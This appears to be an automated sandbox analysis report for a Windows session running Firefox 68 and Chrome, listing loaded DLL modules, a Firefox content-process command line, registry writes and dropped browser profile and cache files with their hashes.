c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\mozilla firefox\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\mozilla firefox\nss3.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\program files\mozilla firefox\lgpllibs.dll
c:\program files\mozilla firefox\xul.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\mscms.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\audioses.dll
c:\program files\mozilla firefox\softokn3.dll
c:\program files\mozilla firefox\freebl3.dll
c:\windows\system32\wpc.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\netutils.dll

PID
3008
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2992.36.1854972750\1855775121" -childID 7 -isForBrowser -prefsHandle 3296 -prefMapHandle 4320 -prefsLen 9440 -prefMapSize 184763 -safeMode -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2992 "\\.\pipe\gecko-crash-server-pipe.2992" 4488 tab
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
Parent process
firefox.exe
User
admin
Integrity Level
LOW
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\mozilla firefox\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\mozilla firefox\nss3.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\program files\mozilla firefox\lgpllibs.dll
c:\program files\mozilla firefox\xul.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\mscms.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\audioses.dll

Registry activity

Total events
1497
Read events
1424
Write events
72
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
2796
chrome.exe
delete key
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
failed_count
0
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
2
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
01000000
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
1
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
dr
1
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome
UsageStatsInSample
0
2796
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
usagestats
0
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_installdate
0
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_enableddate
0
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
0
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
lastrun
13212659922181250
2796
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Common\Rlz\PTimes
C
675DA5597168D501
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Common\Rlz\RLZs
C1
1C1GCEA_enUA812UA812
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Common\Rlz\RLZs
C2
1C2GCEA_enUA812
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Common\Rlz\RLZs
C7
1C7GCEA_enUA812
2796
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
1
2864
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
2796-13212659920384375
259
2864
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
2796-13212659920384375
0
2536
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
3536
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
3840
firefox.exe
write
HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
C:\Program Files\Mozilla Firefox\firefox.exe|Launcher
C06CD65A01000000
1016
firefox.exe
write
HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
C:\Program Files\Mozilla Firefox\firefox.exe|Browser
5FDED95A01000000
1016
firefox.exe
write
HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
C:\Program Files\Mozilla Firefox\firefox.exe|Telemetry
1
2528
pingsender.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2528
pingsender.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000092000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2528
pingsender.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
3820
firefox.exe
write
HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
C:\Program Files\Mozilla Firefox\firefox.exe|Launcher
38DEC75B01000000
2992
firefox.exe
write
HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
C:\Program Files\Mozilla Firefox\firefox.exe|Browser
CD3CD05B01000000
2992
firefox.exe
write
HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
C:\Program Files\Mozilla Firefox\firefox.exe|Telemetry
1
2992
firefox.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2992
firefox.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000093000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
1508
SearchProtocolHost.exe
write
HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
1508
SearchProtocolHost.exe
write
HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\MuiCache\72\52C64B7E
@C:\Windows\system32\notepad.exe,-469
Text Document
1508
SearchProtocolHost.exe
write
HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\MuiCache\72\52C64B7E
@C:\Windows\System32\wshext.dll,-4804
JScript Script File
1508
SearchProtocolHost.exe
write
HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\MuiCache\72\52C64B7E
@C:\Windows\System32\msxml3r.dll,-1
XML Document

Files activity

Executable files
2
Suspicious files
93
Text files
202
Unknown types
80

Dropped files

PID
Process
Filename
Type
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\gmp-widevinecdm\4.10.1440.18\widevinecdm.dll
executable
MD5: f634756cf6a4be877fc71120738ac7f3
SHA256: 677072eb97381f11bb49561a4ebd01cbf012e3f8da070e0aa697ad9714c244ce
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\gmp-gmpopenh264\1.8.1\gmpopenh264.dll
executable
MD5: d23f706f2eacc190f2d4b75b041670d5
SHA256: ced08ce5bc45dbe505fa94b3a4268c0830ccda016a23c0acb16dd7268cfa7a65
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\extension-preferences.json
text
MD5: 4e19dc99366d1124cb824af21b740535
SHA256: 25f91027becd2340f4c90e76fe5d439cd5c420e50f05b0ed21bb762cfdbc24c8
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\prefs.js
text
MD5: 1971cff4f6b6fce242e97725320aec9c
SHA256: d7f63d2690b73e5ed55c993cab2125b2a0e908aa892b7d996a23810f72de0ac0
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\prefs-1.js
––
MD5:  ––
SHA256:  ––
3368
firefox.exe
C:\Users\admin\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\sessionstore-backups\upgrade.jsonlz4-20190717172542
jsonlz4
MD5: 0c87844560f41d4e901bd7e4b0831ac8
SHA256: 427b6914612dcc77d405bc63f01f0064d8afed214767ea70e77675904280cf81
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\sessionstore-backups\recovery.jsonlz4
jsonlz4
MD5: 5301aec136c773540070d58fd7644b5a
SHA256: 064c0b7d5e98ec9221cfd152a3a73aff4741ea058f9eb4587564a803f3348975
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\sessionstore-backups\recovery.jsonlz4.tmp
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\sessionstore-backups\previous.jsonlz4
jsonlz4
MD5: 0c87844560f41d4e901bd7e4b0831ac8
SHA256: 427b6914612dcc77d405bc63f01f0064d8afed214767ea70e77675904280cf81
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\EE197B20CAB0419D1C0BD23EE03034F880EDC296
image
MD5: 7bb9b7221c052f6b7ade6411e01dac80
SHA256: 3c0065bfc4df87c27b50edbb754d562f0ae9e9892826e9d38245529eec13f036
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\3428896C8A9132471F5989C455A8C13637750A24
image
MD5: f999547249ec4e9a71a251dd45ebb853
SHA256: 1e929742ead2ef3f0ac95db6f9b05255130c7d9a696f17157f8565598bd7ffd4
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\C84B337CB2DF88F1F781AE1CB11C160309AA96A5
binary
MD5: 79db77ca5ed96bbd10f03e3e11b2955a
SHA256: aa599edaf032235e8b0a742c6e301e31f6972df8c636ddd7749590547865fd74
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\startupCache\scriptCache-child.bin
binary
MD5: 12231af25be5b279a0146bd81a4dba87
SHA256: eb534f64e55b64c03e9b86bbb2a2c17cbc81cfa2b8d7a2bda7686f3e8f977f0a
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\startupCache\scriptCache-child-new.bin
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\startupCache\scriptCache.bin
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\startupCache\scriptCache-new.bin
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\startupCache\urlCache.bin
binary
MD5: 1f63464dbea947a23d54664a641ace36
SHA256: d2167d96cf62bd683c6def33e81f8eab0d92f03eeab2eebbf3da1687b0388518
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\startupCache\urlCache-new.bin
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
sqlite
MD5: 139aaa1d63eb9668b77dab73180b0868
SHA256: 9470dd6019afebd6904b75c473038723e13b83d3f804b680daa470344617f895
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\startupCache\webext.sc.lz4
binary
MD5: 028669432348049c09faea97bcfd93ba
SHA256: 5a0a5445cdabbc80ca96eafb0bf6d519f01674e6bc44e21a7350d0d374a11db9
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\startupCache\webext.sc.lz4.tmp
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\5FE6175F92BC7C870FFDF78010FAE79545468175
binary
MD5: 71afbb5d24fc8fc996435839805d11de
SHA256: 2581f7454696b75695509282005dadb0baa09d1c7b5872f9b111c4dba297c20b
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\B924DFBE8854FA1EBC4948B7BC8C6074602C010A
binary
MD5: 3887c434bed34125baf7d6a2b1855aaf
SHA256: f94abcef0fe0286dbc28dc829f7dad17c009fe08be40d97902e546efdb9b286b
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F
binary
MD5: 10b1442598b44974c567600abfe38d73
SHA256: 380c9e859ba5c9e6dbfc13c18058330891aebf87fc647e9f25948936fe339504
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\E910D1FCE8BF27F5536B88567A4DC32624377CC3
binary
MD5: 8e5403a2281adc9f9964470f66c9f21f
SHA256: 654d63cbc06dfd3f5a1f7b5fd3d2c849e171b684149045394168ec9785f136fc
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\doomed\6419
pgc
MD5: 2481315cdec109c92089b3a9278035f0
SHA256: bae86432011443290d26aa5202ca05c3f4c320ad569d70015ac7449d567bc541
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\66F684AF9CC570C6247262B47C769C601C2A338B
binary
MD5: 4abd61a2b5ca1a58910e0730b8f77fa4
SHA256: 2967933ce1e3a773aaa99544397b60fec7660c13673e2df22b245d00238cbf1b
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\9A3EF8133F0FA6C3DE8D839A13E7E624CC01FBCC
binary
MD5: 92dd09dc2193da9693cffa37246700ce
SHA256: 95cbb4cadd1d0e51dcbdcac4cd12e7c2d381792708e2d61ff458650f545347ab
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\thumbnails\b3e037a842ba4ab0b367be22be9a1c95.png
image
MD5: 5ca67ac533d6a113d05278ef38098e11
SHA256: 96cb5f2b2695bbc696746d6dd5a83dd9a46f7afdbb3eb73ce213af9244cf5ad2
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\thumbnails\b3e037a842ba4ab0b367be22be9a1c95.png.tmp
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\A11C591182B4205C3B3980C0A08491ED839687BA
binary
MD5: edb32872799f44abea0497b34062b696
SHA256: 6b12d2a54a8c499b182928e1c74a293b0d7c0712711f291868d36c77ce885bb3
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\prefs.js
text
MD5: e583c711c550221f20293382c157b36f
SHA256: 38d92796820d7b52adfc03887cb4ebbc4ab2fee8509d9983dd58178567fb0fa1
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\85EFB956D206E881A576A955D81586F3B6B707F0
cer
MD5: 77a417226e8212f1cc0fd4773f04e5c1
SHA256: 9545438e1895e364a62ea16c0ae31b76aca3bcfb0770c7da633becbb0f5cc570
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\prefs.js
text
MD5: 372dd97e5d6af6554f08d6b63e160d84
SHA256: 149a0460dc9bfc0f2bbcba077794fd065d23daed7a2fdc433180fc8c1bac0a08
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\60FE854E82FC29C0438A27CD9052E9A69CF28539
ini
MD5: 211a83c6655eba0a79fdd504d2df3e99
SHA256: 60432567fa207c1233ccffbc62878e8ac4052bd6d69e6ebbe4b2215d9448a920
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\ECDF3991684EC04D17FAA5AB6679A0C4AF511A4D
compressed
MD5: 2c71d2f7c882a282f2e6f1d0e2d763b5
SHA256: ffed313bf5fb38a7e690b255963962067c8951228d5f5c59421357f4fdce310d
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\996D20D018E4F7762222CD38EB107482289071F3
woff2
MD5: 9ffc71530f00aa3af385902bab9f5ea2
SHA256: 08cb0b0993259cd371366325a83d99d4565d36b6214460e3d25d447aeebfe60e
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\9DF825CC78A660D81D571A4A46F060676D7CF4F3
woff2
MD5: b440d621b86c0b7a72c5712b0151298f
SHA256: 581a29ff6918ed6afb2f5903e5c8d230cba9b5f18644136398fc43aca85c5f07
2992
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cache2\entries\C664ABAE6A070392F60C7BFF721450AA0CF7DBA0
binary
MD5: db8b729aa21a9e4729e2654cf065df60
SHA256: 9096864d161657629cdfce04b8d83090ffc6f82a3a7caf1a9d7fa663f56c669a
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
sqlite
MD5: bcce6b5ee7bf21586328717de86097f0
SHA256: b5f9e45472d6c4af9bb99ee0f7f3177946c85670f7f80a66de3c3cd922e52e1c
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
binary
MD5: b7c14ec6110fa820ca6b65f5aec85911
SHA256: fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\prefs.js
text
MD5: 6f92e8d791935f2712d534ccd084944f
SHA256: 4a616c4598f7566ad322db9dbb41b07331e5015c7577cd0bad4fb96df5ac1b56
2992
firefox.exe
C:\Users\admin\AppData\Local\Temp\mz_etilqs_NHTjzZpXolVKQYv
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Local\Temp\mz_etilqs_s64ROGhKZE6JZKa
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\containers.json.tmp
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\containers.json
text
